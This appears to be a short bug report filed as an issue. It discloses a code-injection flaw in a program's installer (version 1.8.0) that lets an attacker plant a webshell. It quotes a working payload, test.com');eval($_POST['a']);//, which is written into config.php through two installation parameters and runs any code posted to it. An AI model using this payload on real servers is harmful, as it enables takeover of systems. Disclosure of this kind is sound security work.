There are vulnerabilities in the program installation, which can cause hackers to obtain server permissions
ch0x01e opened this issue · comments
There are vulnerabilities in program V1.8.0
The vulnerability is located in the image below
The loophole is in these two parameters, which can be written directly to the Webshell at installation time by constructing a specific payload
payload:test.com');eval($_POST['a']);//
After payload is written, a config.php file is automatically generated. The parentheses close and the webshell can be accessed
The following figure shows the webshell result